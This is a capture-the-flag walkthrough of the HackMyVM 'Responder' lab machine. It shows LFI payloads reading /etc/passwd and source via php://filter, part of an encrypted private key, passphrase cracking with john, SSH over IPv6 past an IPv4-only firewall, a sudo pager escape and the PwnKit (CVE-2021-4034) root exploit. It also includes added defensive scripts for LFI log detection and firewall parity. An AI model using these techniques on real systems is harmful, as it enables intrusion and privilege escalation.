HackMyVm Responder Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Responder

Scan the ports and notice that port 22 shows as filtered.

 nmap -sV -sC -oN port.log 192.168.56.100
 Nmap scan report for darkmatter.hmv (192.168.56.100)
 Host is up (0.12s latency).
 Not shown: 998 closed tcp ports (conn-refused)
 PORT   STATE    SERVICE VERSION
 22/tcp filtered ssh
 80/tcp open     http    Apache httpd 2.4.38 ((Debian))
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 |_http-server-header: Apache/2.4.38 (Debian)

Check port 80: there is only a simple page that prints the current time.

 ~/D/responder $curl 192.168.56.100
 your answer is in the answer.. it's
 01:46
 and your time is running out..

Directory-bust port 80 and find filemanager.php. The thread count can't be set too high on this box; I used 20.

 ~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
 /index.php            (Status: 200) [Size: 73]
 /filemanager.php      (Status: 302) [Size: 0] [--> /]

Fuzz the parameter name of filemanager.php; the one that changes the response is random.

 ~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd"  -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload                
 =====================================================================
 000003395:   302        27 L     39 W       1430 Ch     "random"

The LFI works: read /etc/passwd and get two usernames.

 ~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"
 root:x:0:0:root:/root:/bin/bash
 ...
 elliot:x:1001:1001::/home/elliot:/bin/bash
 rohit:x:1002:1002::/home/rohit:/bin/bash

After enumerating some Linux files, we cannot get a shell through the log files. So read the source code of filemanager.php through the php://filter wrapper, and it turns out to contain an SSH private key in a comment.

 ~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-encode/resource=filemanager.php" |base64 -d
 ...
 <?php
     $filename = $_GET['random'];
     include($filename);
     header('Location:/');
 
 
 /*
 
 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,411124D3C302D4F4
 
 XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
 ...
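The request pattern above (a bare path such as /etc/passwd, traversal sequences, and php:// wrappers in a query parameter) is easy to spot in a web server's access log. The following detector is an added example, not code from the walkthrough or from the box: it parses Apache combined-format lines, fully URL-decodes each query value so double-encoded traversal is not missed, and reports the indicator that matched. The parameter name random comes from the page; the log lines, timestamps and client address are constructed.

```python
"""Flag local-file-inclusion (LFI) attempts in Apache access logs.

Added example, not code from the original walkthrough. The log lines are
constructed to mirror the requests made to filemanager.php on the page; the
parameter name "random" comes from the page, the timestamps and client IP
are assumed.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Apache "combined" log prefix (assumed format); the referer/agent tail is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each indicator is tested against the fully URL-decoded parameter value.
INDICATORS = (
    ("traversal", re.compile(r"(^|/)\.\.(/|$)")),
    ("sensitive-file", re.compile(r"^/(etc/(passwd|shadow|group)|proc/self|var/log)")),
    ("php-wrapper", re.compile(r"^(php|data|expect|phar|zip)://", re.IGNORECASE)),
)


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../ ."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(url):
    """Return (param, indicator) pairs for every query parameter that looks like LFI."""
    hits = []
    query = urlparse(url).query
    # parse_qs already decodes one layer; decode_fully handles double encoding.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            value = decode_fully(raw)
            for label, pattern in INDICATORS:
                if pattern.search(value):
                    hits.append((name, label))
    return hits


def scan_log(lines):
    """Parse each access-log line and keep those with at least one indicator."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line: skip rather than crash the scan
        hits = classify_request(match["url"])
        if hits:
            findings.append({
                "ip": match["ip"],
                "url": match["url"],
                "status": int(match["status"]),
                "hits": hits,
            })
    return findings


# Constructed sample log: the first three lines model the page's requests,
# the last one is benign.
SAMPLE_LOG = [
    '192.168.56.1 - - [05/Feb/2022:08:40:01 +0800] "GET /filemanager.php?random=/etc/passwd HTTP/1.1" 302 1430',
    '192.168.56.1 - - [05/Feb/2022:08:41:12 +0800] "GET /filemanager.php?random=php://filter/convert.base64-encode/resource=filemanager.php HTTP/1.1" 302 5120',
    '192.168.56.1 - - [05/Feb/2022:08:42:30 +0800] "GET /filemanager.php?random=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 302 0',
    '192.168.56.1 - - [05/Feb/2022:08:43:00 +0800] "GET /index.php HTTP/1.1" 200 73',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["hits"], finding["url"])
```

Detection is the second line of defence; the first is not passing a user-controlled value to include() at all. Resolving the requested name against an allow-list of known page names (or a fixed directory plus a realpath check) removes both the traversal and the wrapper problem, and keeping secrets such as private keys out of web-served source removes what the filter trick exposed here.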

Crack the passphrase of the SSH key with john.

 ~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt
 ~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
 ...
 Press 'q' or Ctrl-C to abort, almost any other key for status
 xxxxxx          (id_rsa)

Now we have the username, SSH key and passphrase to connect to port 22, but port 22 is filtered over IPv4. Maybe it can be reached over IPv6.

Find the machine's link-local IPv6 address by pinging the all-nodes multicast address ff02::1.

 ~/D/responder $ping6 -c2 -n -I eth1 ff02::1
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 ...
 64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
 ...

Scan port 22 over IPv6: yes, it's open.

 ~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1
 Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
 Nmap scan report for fe80::a00:27ff:fec2:1426
 Host is up (0.0097s latency).
 
 PORT   STATE SERVICE
 22/tcp open  ssh
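Port 22 being filtered over IPv4 but open over IPv6 is the classic sign of a firewall that was only configured for one address family: iptables rules do not apply to IPv6 traffic, which needs matching ip6tables rules (or a single nftables table of family inet). The script below is an added example, not part of the walkthrough or the box, that takes two saved rulesets in iptables-save / ip6tables-save syntax and lists ports blocked for IPv4 but accepted for IPv6. The rulesets are constructed to model this machine; only INPUT rules with an explicit --dport are evaluated, which is all this check needs.

```python
"""Check IPv4/IPv6 firewall parity from saved rulesets.

Added example, not from the original walkthrough. The two rulesets are
constructed in iptables-save / ip6tables-save syntax to model the page's
finding: TCP/22 dropped over IPv4 but reachable over IPv6 because no
ip6tables rule mirrors it. Only rules with an explicit --dport are
considered, which is enough for this check.
"""


def chain_policy(saved, chain):
    """Default policy of a chain from its ':CHAIN POLICY [p:b]' header line."""
    for line in saved.splitlines():
        if line.startswith(":" + chain + " "):
            return line.split()[1]
    return "ACCEPT"


def parse_rules(saved):
    """Return (chain, proto, port, target) for every -A rule carrying --dport."""
    rules = []
    for line in saved.splitlines():
        if not line.startswith("-A "):
            continue
        tokens = line.split()
        chain, proto, port, target = tokens[1], None, None, None
        for i, tok in enumerate(tokens[:-1]):
            if tok == "-p":
                proto = tokens[i + 1]
            elif tok == "--dport":
                port = int(tokens[i + 1])
            elif tok == "-j":
                target = tokens[i + 1]
        if port is not None:
            rules.append((chain, proto, port, target))
    return rules


def port_verdicts(saved, ports, chain="INPUT", proto="tcp"):
    """First-match verdict per port; the chain policy applies when no rule matches."""
    rules = [r for r in parse_rules(saved) if r[0] == chain and r[1] == proto]
    policy = chain_policy(saved, chain)
    return {port: next((t for _, _, p, t in rules if p == port), policy) for port in ports}


def find_gaps(v4_saved, v6_saved, ports, chain="INPUT", proto="tcp"):
    """Ports blocked (DROP/REJECT) over IPv4 but accepted over IPv6."""
    v4 = port_verdicts(v4_saved, ports, chain, proto)
    v6 = port_verdicts(v6_saved, ports, chain, proto)
    return [(p, v4[p], v6[p]) for p in ports if v4[p] != "ACCEPT" and v6[p] == "ACCEPT"]


# Constructed IPv4 ruleset: SSH dropped (shows as "filtered" to a scanner), HTTP allowed.
V4_RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT
"""

# Constructed IPv6 ruleset: left at defaults, so every port falls through to ACCEPT.
V6_RULES = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
"""

if __name__ == "__main__":
    for port, v4, v6 in find_gaps(V4_RULES, V6_RULES, [22, 80]):
        print(f"tcp/{port}: IPv4={v4} IPv6={v6} -> mirror the rule with ip6tables")
```

On a real host, feed it the output of iptables-save and ip6tables-save. The fix is either to add the same DROP with ip6tables, or to move to nftables with a table of family inet so one rule set covers both families; disabling IPv6 on the interface is a cruder alternative when it is not needed at all.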

Log in over SSH as user elliot.

 ~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6
 Enter passphrase for key 'id_rsa':
 Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 elliot@responder:~$ id
 uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)

Check sudo -l.

 elliot@responder:~$ sudo -l
 sudo: unable to resolve host responder: Temporary failure in name resolution
 Matching Defaults entries for elliot on responder:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User elliot may run the following commands on responder:
     (rohit) NOPASSWD: /usr/bin/calc

Run calc as rohit, open the help page (it is displayed through a pager), and type "!/bin/bash" at the pager's ":" prompt to get a shell as rohit.

 elliot@responder:~$ sudo -u rohit /usr/bin/calc
 sudo: unable to resolve host responder: Temporary failure in name resolution
 C-style arbitrary precision calculator (version 2.12.7.2)
 Calc is open software. For license details type:  help copyright
 [Type "exit" to exit, or "help" for help.]
 
 ; help
 ...
 For more information while running calc, type  help  followed by one of the
 following topics:
 
     topic               description
     -----               -----------
     intro               introduction to calc
     overview            overview of calc
     help                this file
 ...
 !/bin/bash
 ...
 rohit@responder:/home/elliot$ id
 uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)

Check SUID files and notice pkexec (polkit).

 elliot@responder:~$ find / -perm -u=s 2>/dev/null
 /usr/bin/passwd
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/gpasswd
 /usr/bin/su
 /usr/bin/mount
 /usr/bin/pkexec
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/umount
 /usr/lib/policykit-1/polkit-agent-helper-1
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/openssh/ssh-keysign
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

Use the latest polkit CVE (CVE-2021-4034, PwnKit in pkexec) to get root.

 elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
 elliot@responder:/tmp$ ./cve-2021-4034-poc
 # id
 uid=0(root) gid=0(root) groups=0(root),1001(elliot)
